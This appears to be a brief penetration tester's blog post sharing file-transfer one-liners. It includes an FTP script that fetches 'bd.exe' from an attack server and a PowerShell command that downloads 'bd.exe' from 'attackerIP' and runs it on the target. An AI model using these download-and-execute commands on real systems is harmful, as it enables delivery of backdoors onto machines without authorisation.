*sighs*, just for my records

I am reading the RTFM and I am slowly adding a lot of one-liners and random things to my toolkit. On older systems you can easily download files to and from your targets using ftp, on most newer OS’s (Win 7, 2008/2012, etc.), FTP is not installed or allowed by default.

For example, you can create a simple ftp script and then run it with “ftp -s:ftp.txt”:

open yourattackserver
username
password
get bd.exe
bye

However, this does not work on some modern systems, even if you use the interactive settings “-i or -n”. Well, lucky for us, we can use powershell.

powershell -command ” & { (New-Object System.Net.WebClient).DownloadFile(‘http://attackerIP/bd.exe’,’C:\Users\Public \Downloads\bd.exe’);Start-Process ‘C:\Users\Public\Downloads\bd.exe’}”

Again, this is nothing new or fancy, I just wanted to share. I am not sure if this is in the RTFM, I am pretty sure I just got lazy and didn’t look. As I write this, I just found this post from a few years ago. So yeah…nothing new. haha!